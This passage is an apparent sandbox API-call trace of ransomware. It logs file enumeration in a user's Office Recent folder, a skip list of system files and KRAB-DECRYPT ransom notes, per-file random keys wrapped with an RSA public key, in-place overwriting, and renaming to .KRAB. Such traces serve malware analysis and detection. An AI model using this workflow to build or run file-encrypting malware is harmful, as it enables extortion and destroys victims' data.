hFindFile=0xfbd7a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0061.134] lstrcmpW (lpString1="Global.LNK", lpString2=".") returned 1 [0061.134] lstrcmpW (lpString1="Global.LNK", lpString2="..") returned 1 [0061.134] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="Global.LNK" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK" [0061.134] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.135] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK.KRAB") returned 77 [0061.135] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK") returned 72 [0061.135] lstrlenW (lpString=".LNK") returned 4 [0061.135] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.135] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".LNK ") returned 5 [0061.135] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.135] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK") returned 72 [0061.135] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK") returned 72 [0061.135] lstrcmpiW (lpString1="Global.LNK", lpString2="desktop.ini") returned 1 [0061.136] lstrcmpiW (lpString1="Global.LNK", lpString2="autorun.inf") returned 1 [0061.136] lstrcmpiW (lpString1="Global.LNK", lpString2="ntuser.dat") returned -1 [0061.136] lstrcmpiW (lpString1="Global.LNK", lpString2="iconcache.db") returned -1 [0061.136] lstrcmpiW (lpString1="Global.LNK", lpString2="bootsect.bak") returned 1 [0061.136] lstrcmpiW (lpString1="Global.LNK", lpString2="boot.ini") returned 1 [0061.136] lstrcmpiW (lpString1="Global.LNK", lpString2="ntuser.dat.log") returned -1 [0061.136] lstrcmpiW (lpString1="Global.LNK", lpString2="thumbs.db") returned -1 [0061.136] lstrcmpiW (lpString1="Global.LNK", lpString2="KRAB-DECRYPT.html") returned -1 [0061.136] lstrcmpiW (lpString1="Global.LNK", lpString2="KRAB-DECRYPT.txt") returned -1 [0061.136] lstrcmpiW (lpString1="Global.LNK", lpString2="CRAB-DECRYPT.txt") returned 1 [0061.136] lstrcmpiW (lpString1="Global.LNK", lpString2="ntldr") returned -1 [0061.136] lstrcmpiW (lpString1="Global.LNK", lpString2="NTDETECT.COM") returned -1 [0061.136] lstrcmpiW (lpString1="Global.LNK", lpString2="Bootfont.bin") returned 1 [0061.136] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.136] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbb2a8) returned 1 [0061.137] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0061.137] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.137] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.137] CryptGenRandom (in: hProv=0xfbb2a8, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0061.138] CryptReleaseContext (hProv=0xfbb2a8, dwFlags=0x0) returned 1 [0061.138] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.138] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbb7f8) returned 1 [0061.138] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0061.139] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.139] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.139] CryptGenRandom (in: hProv=0xfbb7f8, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0061.139] CryptReleaseContext (hProv=0xfbb7f8, dwFlags=0x0) returned 1 [0061.139] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.140] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbbc38) returned 1 [0061.140] CryptImportKey (in: hProv=0xfbbc38, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd420) returned 1 [0061.140] CryptGetKeyParam (in: hKey=0xfbd420, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0061.140] CryptEncrypt (in: hKey=0xfbd420, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0061.141] GetLastError () returned 0x0 [0061.141] CryptDestroyKey (hKey=0xfbd420) returned 1 [0061.141] CryptReleaseContext (hProv=0xfbbc38, dwFlags=0x0) returned 1 [0061.141] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbb4c8) returned 1 [0061.141] CryptImportKey (in: hProv=0xfbb4c8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd320) returned 1 [0061.141] CryptGetKeyParam (in: hKey=0xfbd320, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0061.141] CryptEncrypt (in: hKey=0xfbd320, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0061.142] GetLastError () returned 0x0 [0061.142] CryptDestroyKey (hKey=0xfbd320) returned 1 [0061.142] CryptReleaseContext (hProv=0xfbb4c8, dwFlags=0x0) returned 1 [0061.142] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\global.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0061.142] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0061.143] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0061.143] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x5e0, lpOverlapped=0x0) returned 1 [0061.196] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xfffffa20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.196] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x5e0, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x5e0, lpOverlapped=0x0) returned 1 [0061.197] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0061.197] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.200] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.201] CloseHandle (hObject=0x448) returned 1 [0061.211] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.211] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\global.lnk"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\global.lnk.krab")) returned 1 [0061.212] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.212] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0061.212] lstrcmpW (lpString1="index.dat", lpString2=".") returned 1 [0061.212] lstrcmpW (lpString1="index.dat", lpString2="..") returned 1 [0061.212] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="index.dat" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" [0061.212] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.212] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.KRAB") returned 76 [0061.212] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 71 [0061.212] lstrlenW (lpString=".dat") returned 4 [0061.213] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.213] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".dat ") returned 5 [0061.213] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.213] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 71 [0061.213] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 71 [0061.213] lstrcmpiW (lpString1="index.dat", lpString2="desktop.ini") returned 1 [0061.213] lstrcmpiW (lpString1="index.dat", lpString2="autorun.inf") returned 1 [0061.213] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat") returned -1 [0061.213] lstrcmpiW (lpString1="index.dat", lpString2="iconcache.db") returned 1 [0061.213] lstrcmpiW (lpString1="index.dat", lpString2="bootsect.bak") returned 1 [0061.213] lstrcmpiW (lpString1="index.dat", lpString2="boot.ini") returned 1 [0061.213] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat.log") returned -1 [0061.213] lstrcmpiW (lpString1="index.dat", lpString2="thumbs.db") returned -1 [0061.213] lstrcmpiW (lpString1="index.dat", lpString2="KRAB-DECRYPT.html") returned -1 [0061.213] lstrcmpiW (lpString1="index.dat", lpString2="KRAB-DECRYPT.txt") returned -1 [0061.213] lstrcmpiW (lpString1="index.dat", lpString2="CRAB-DECRYPT.txt") returned 1 [0061.213] lstrcmpiW (lpString1="index.dat", lpString2="ntldr") returned -1 [0061.213] lstrcmpiW (lpString1="index.dat", lpString2="NTDETECT.COM") returned -1 [0061.213] lstrcmpiW (lpString1="index.dat", lpString2="Bootfont.bin") returned 1 [0061.213] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.214] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbb4c8) returned 1 [0061.214] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0061.215] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.215] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.215] CryptGenRandom (in: hProv=0xfbb4c8, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0061.215] CryptReleaseContext (hProv=0xfbb4c8, dwFlags=0x0) returned 1 [0061.215] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.215] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbc078) returned 1 [0061.216] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0061.216] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.216] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.216] CryptGenRandom (in: hProv=0xfbc078, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0061.216] CryptReleaseContext (hProv=0xfbc078, dwFlags=0x0) returned 1 [0061.216] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.217] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbb880) returned 1 [0061.217] CryptImportKey (in: hProv=0xfbb880, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd620) returned 1 [0061.217] CryptGetKeyParam (in: hKey=0xfbd620, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0061.217] CryptEncrypt (in: hKey=0xfbd620, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0061.217] GetLastError () returned 0x0 [0061.217] CryptDestroyKey (hKey=0xfbd620) returned 1 [0061.217] CryptReleaseContext (hProv=0xfbb880, dwFlags=0x0) returned 1 [0061.217] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbbaa0) returned 1 [0061.218] CryptImportKey (in: hProv=0xfbbaa0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd8a0) returned 1 [0061.218] CryptGetKeyParam (in: hKey=0xfbd8a0, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0061.218] CryptEncrypt (in: hKey=0xfbd8a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0061.218] GetLastError () returned 0x0 [0061.218] CryptDestroyKey (hKey=0xfbd8a0) returned 1 [0061.218] CryptReleaseContext (hProv=0xfbbaa0, dwFlags=0x0) returned 1 [0061.218] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0061.219] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0061.219] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0061.220] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x5f, lpOverlapped=0x0) returned 1 [0061.259] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xffffffa1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.259] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x5f, lpOverlapped=0x0) returned 1 [0061.259] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0061.259] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.263] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.263] CloseHandle (hObject=0x448) returned 1 [0061.264] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.264] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\index.dat.krab")) returned 1 [0061.284] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.284] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0061.284] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0061.284] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0061.284] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\KRAB-DECRYPT.txt" [0061.284] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.284] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\KRAB-DECRYPT.txt.KRAB") returned 83 [0061.285] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\KRAB-DECRYPT.txt") returned 78 [0061.285] lstrlenW (lpString=".txt") returned 4 [0061.285] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.285] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0061.285] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.285] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\KRAB-DECRYPT.txt") returned 78 [0061.285] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\KRAB-DECRYPT.txt") returned 78 [0061.285] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0061.285] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0061.285] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0061.285] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0061.285] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0061.285] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0061.285] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0061.285] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0061.285] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0061.285] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0061.285] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.286] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0061.286] lstrcmpW (lpString1="Templates.LNK", lpString2=".") returned 1 [0061.286] lstrcmpW (lpString1="Templates.LNK", lpString2="..") returned 1 [0061.286] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="Templates.LNK" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK" [0061.286] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.286] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK.KRAB") returned 80 [0061.286] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned 75 [0061.286] lstrlenW (lpString=".LNK") returned 4 [0061.286] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.287] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".LNK ") returned 5 [0061.287] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.287] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned 75 [0061.287] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned 75 [0061.287] lstrcmpiW (lpString1="Templates.LNK", lpString2="desktop.ini") returned 1 [0061.287] lstrcmpiW (lpString1="Templates.LNK", lpString2="autorun.inf") returned 1 [0061.287] lstrcmpiW (lpString1="Templates.LNK", lpString2="ntuser.dat") returned 1 [0061.287] lstrcmpiW (lpString1="Templates.LNK", lpString2="iconcache.db") returned 1 [0061.287] lstrcmpiW (lpString1="Templates.LNK", lpString2="bootsect.bak") returned 1 [0061.287] lstrcmpiW (lpString1="Templates.LNK", lpString2="boot.ini") returned 1 [0061.287] lstrcmpiW (lpString1="Templates.LNK", lpString2="ntuser.dat.log") returned 1 [0061.287] lstrcmpiW (lpString1="Templates.LNK", lpString2="thumbs.db") returned -1 [0061.287] lstrcmpiW (lpString1="Templates.LNK", lpString2="KRAB-DECRYPT.html") returned 1 [0061.287] lstrcmpiW (lpString1="Templates.LNK", lpString2="KRAB-DECRYPT.txt") returned 1 [0061.287] lstrcmpiW (lpString1="Templates.LNK", lpString2="CRAB-DECRYPT.txt") returned 1 [0061.287] lstrcmpiW (lpString1="Templates.LNK", lpString2="ntldr") returned 1 [0061.287] lstrcmpiW (lpString1="Templates.LNK", lpString2="NTDETECT.COM") returned 1 [0061.287] lstrcmpiW (lpString1="Templates.LNK", lpString2="Bootfont.bin") returned 1 [0061.287] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.287] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbca08) returned 1 [0061.288] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0061.288] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.289] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.289] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0061.289] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.289] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.289] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbca08) returned 1 [0061.289] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0061.290] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.290] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.290] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0061.290] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.290] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.290] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbca08) returned 1 [0061.291] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd5a0) returned 1 [0061.291] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0061.291] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0061.291] GetLastError () returned 0x0 [0061.291] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0061.291] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.291] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbca08) returned 1 [0061.292] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, 